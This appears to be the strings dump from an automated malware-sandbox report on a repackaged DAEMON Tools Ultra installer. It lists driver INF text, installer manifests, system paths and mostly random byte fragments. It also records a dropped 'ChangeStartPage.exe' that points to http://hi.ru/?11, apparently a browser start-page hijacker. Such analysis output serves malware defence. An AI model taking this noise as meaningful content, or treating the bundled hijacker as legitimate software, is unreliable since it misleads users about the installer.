Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1p]w:k1)@>aA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

211111111))

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2:::7RZ:L9TKT^QW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2:::R::RRN6KMMMPWVWjo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2gI/KI*%e>,/\>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2~a``Z`\\___

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(Video) Hybrid Analysis Tool For Checking File for Virus / Malware || Cyber Defense

3'e}.KgQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3......

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

39[QHU?^\`}t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3:M:9ND=c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3H&u ]:'p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3hoVM)_m[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3y]0*C:FY[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3z@QQV3Le\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4(g+8y3:Cg*^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

41.@'kRQg\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4gEZfa&d]K.Y{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4T\:L/`zr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5A^f(`za!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5DXP[XcG[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5SZVoZv+<@!u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

668::;;===!!<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

6N@Jfs"L(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7]S:UWq7H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7MbK^!M)ua

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8-~sS.(<dom

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

84I:YP((3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8?8ye}{)b,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8jOW/R,.n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8L1b)X#:M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8LW1R:)iU)|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

93@ryVM,o.DA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9i!;*w Ml2vF:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9JDcof(3(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9NKLNNK\\P^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

: /D=

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /ND

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /NS

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /EN

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /RU

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /UA

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe /S /RU /D=C:\MyProgram

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

:%@$:TwmH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:(:0:8:

Ansi based on Dropped File (imgengine.dll.62529018)

:) L7)jy[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:02"/><file name="Uninstall.exe" size="877450" date="11-24-2016" time="17:44"/><file name="VDriveLib.dll" size="745744" date="

Unicode based on Runtime Data (dtinst.exe )

:1=a Isz Gx@i8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:7Ej]W5OE

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

::$DATA

Unicode based on Dropped File (JSSys3.dll.204366558)

:;==>!7<>7

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

:[RoXDPq]yt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:\>f>v>

Ansi based on Dropped File (imgengine.dll.62529018)

:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe"

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

:a3]3nq|qL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:blmtQBF,{Z,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:encryptable:$DATA

Unicode based on Dropped File (JSSys3.dll.204366558)

:qa4Q-cm)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:Ww)f~Jl6V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above

Ansi based on Dropped File (SET4F37.tmp)

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above[Version]signature = "$WINDOWS NT$"Class = SCSIAdapterClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}Provider = %Vendor%CatalogFile = dtultrascsibus.catD

Ansi based on Runtime Data (DiscSoftBusService.exe )

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above[Version]signature = "$WINDOWS NT$"Class = SCSIAdapterClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}Provider = %Vendor%CatalogFile = dtultrascsibus.catDriverVer=12/08/2014,5.24.0.0[DestinationDirs]DefaultDestDir = 12[SourceDisksNames.x86]1 = %MediaDescription%[SourceDisksFiles]dtultrascsibus.sys = 1[Manufacturer]%Vendor% = Vendor, NTx86[Vendor.NTx86]%DTULTRASCSIBUS.DeviceDesc% = DTULTRASCSIBUS, root\dtultrascsibus[DTULTRASCSIBUS.NTx86]CopyFiles = Drivers_Dir[DTULTRASCSIBUS.NTx86.HW]AddReg = DTULTRASCSIBUS.NTx86.AddReg[DTULTRASCSIBUS.NTx86.AddReg]HKR,,DeviceCharacteristics,0x10001,0x0100 ; Use same security checks on relative opensHKR,,Security,,"D:P(A;;GA;;;SY)(A;;GA;;;BA)" ; Allow generic-all access to Local system and Built-in administrators[DTULTRASCSIBUS.NTx86.Services]AddService = dtultrascsibus, 2, DTULTRASCSIBUS_ServiceInstall[DTULTRASCSIBUS_ServiceInstall]DisplayName = %DTULTRASCSIBUS.DeviceDesc%ServiceType = 1StartType = 3ErrorControl = 1ServiceBinary = %12%\dtultrascsibus.sysLoadOrderGroup = SCSI Miniport[Drivers_Dir]dtultrascsibus.sys;; Strings;[Strings]MediaDescription = "DAEMON Tools Ultra Virtual SCSI Bus Driver"Vendor = "Disc Soft Ltd"DTULTRASCSIBUS.DeviceDesc = "DAEMON Tools Ultra Virtual SCSI Bus"

Ansi based on Dropped File (SET4F37.tmp)

;$IHl,]f!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;8<<3503+..+++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;;t<4<23/0.+0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;<[+2J{ef

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;T)f[xafzk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;Yagjlkga^\[[`fkmoojY=

Ansi based on Dropped File (Uninstall.exe.212096218)

;{{X/v@*l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<,/io$u.w

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<6hc!|".

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00438000.00000002.mdmp)

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel> </requestedPrivileges> </security> </trustInfo></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.0084C000.00000002.mdmp)

<PYPm"@b.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRe

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

==!!<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

=@r!lFNc!(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=h=C}d4\k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=wy{~Ji/P

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>

Ansi based on Dropped File (imgengine.dll.62529018)

>%9\9jE[2F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>))PY2yf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>>> [Device Install (UpdateDriverForPlugAndPlayDevices) - root\dtultrascsibus]>>> Section start 2016/11/24 10:13:00.891 cmd: "%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /reg_scsi dtultrascsibus {874FDCE0-46C5-4C59-8B25-3159C12C6B86} "DAEMON Too

Ansi based on Runtime Data (dtinst.exe )

>C?[?{?

Ansi based on Dropped File (imgengine.dll.62529018)

>U]Q?bxq@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>}#6T:{vv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>}ZS]]C}MuemEyEmiiiu,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?=(H:>0W4BmB9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (dtinst.exe )

@&<W9\,3C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@.data

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@.reloc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

@.rsrc

Ansi based on Dropped File (imgengine.dll.62529018)

@.tgs0

Ansi based on Dropped File (Tages.dll.423655889)

@6J9i-'ULF (

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@:WK-Mfl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@=ala5/Fi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@@+$+((.033668:;;=>=>><=4

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@@@@@+

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@@@@@@@@@@@@@+

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@e*:N@y,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@FFD>>F>>>>>ZZZr_\WVXeX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@hHd&!z.ov

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@Microsoft Visual C++ Runtime Library

Unicode based on Dropped File (dtinst.exe.3474642986)

@PcEx_F"}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@s9:+]THJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[%Bx\f

Ansi based on Dropped File (imgengine.dll.62529018)

[6EMlC.hW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[7JUH!TiF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[8[;64;3,//,,++++++.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[:On1cY'n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[?=0@q3e*y/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[DestinationDirs]

Ansi based on Dropped File (SET4F37.tmp)

[Drivers_Dir]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.AddReg]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.HW]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.Services]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS_ServiceInstall]

Ansi based on Dropped File (SET4F37.tmp)

[InternetShortcut]URL=http://hi.ru/?11

Ansi based on Runtime Data (ChangeStartPage.exe )

[M&6aGw(f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[M;[66;5,4/,,.,+,+,/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Manufacturer]

Ansi based on Dropped File (SET4F37.tmp)

[P& ^O92\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Rename]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[SourceDisksFiles]

Ansi based on Dropped File (SET4F37.tmp)

[SourceDisksNames.x86]

Ansi based on Dropped File (SET4F37.tmp)

[SS[96;4644,,3,,4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Strings]

Ansi based on Dropped File (SET4F37.tmp)

[Stt88<435/+..

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Sxt4;=43<5+.0+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[vbEmG7A3i

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Vendor.NTx86]

Ansi based on Dropped File (SET4F37.tmp)

[Version]

Ansi based on Dropped File (SET4F37.tmp)

\43VNeoC\AppData\Local\Temp\nsrD151.tmp\nsDialogs.dll

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

\??\VOLUME

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\\.\MountPointManager

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\^Fw'=[yF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\_Yl_V)3S;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\_Yp83]T?g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\cR:s`0)Xp+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\Device\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\DOSDEVICES\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\drivers\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\drivers\dtusb.sys

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

\dtusbbus.inf

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

\jssyswp.bmp

Unicode based on Dropped File (JSSys3.dll.204366558)

\LocalServer32

Unicode based on Dropped File (JSSys3.dll.204366558)

\Microsoft\Internet Explorer\Quick Launch

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\RPC Control\console-0x00000C5C-lpc-handle

Unicode based on Runtime Data (nsE23E.tmp )

\RPC Control\console-0x00000E34-lpc-handle

Unicode based on Runtime Data (nsCDD1.tmp )

\RPC Control\console-0x00000E74-lpc-handle

Unicode based on Runtime Data (nsF6AA.tmp )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

\settings.ini

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

\Shell\Open\Command

Unicode based on Dropped File (JSSys3.dll.204366558)

\Shell\Opennew\Command

Unicode based on Dropped File (JSSys3.dll.204366558)

\ThemeApiPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

\VersionIndependentProgID

Unicode based on Dropped File (JSSys3.dll.204366558)

\}D]6~ej$~aFO

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]1yt{s:",

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]G'hXa>&/:^a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]n/Csyl1f1:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]p@d(L<_@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]Z[QOCth.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^<)Au j?]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^=uA}/6DH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^Hhp9/@/g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^U[[S8[845533/++.+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_3.O.O.O_9

Ansi based on Image Processing (screen_4.png)

_[\DRBR"."....

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

__vbaFailedFriend

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaInStr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaInStrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaObjSet

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaObjSetAddref

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaOnError

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaSetSystemError

Ansi based on Dropped File (JSSys3.dll.204366558)

_`_]Ktgt.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_J]e*]ldd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_}}W3Co9TX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`!Y`yMN\B3P

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`$.`Z-V;)E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`/5{2.7L})v*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`?ewvI}{A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

`Z`Z\]\__

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`{}S8h654

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a1a[<d:0'Q8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A=Z)-|/W\4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A[%d,%d]

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

AddReg = DTULTRASCSIBUS.NTx86.AddReg

Ansi based on Dropped File (SET4F37.tmp)

AddService = dtultrascsibus, 2, DTULTRASCSIBUS_ServiceInstall

Ansi based on Dropped File (SET4F37.tmp)

ae^aPXWOT]]]s_s?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AEvI)T @<9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aF\x@b=K.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ak/g}`_kd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aL%:hG($J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

All files(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

All Files(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

B4{K{jq(\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b@hPMUe{D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B[%d,%d]

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

b]@Fsp`bK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

BBZZRR0-))$

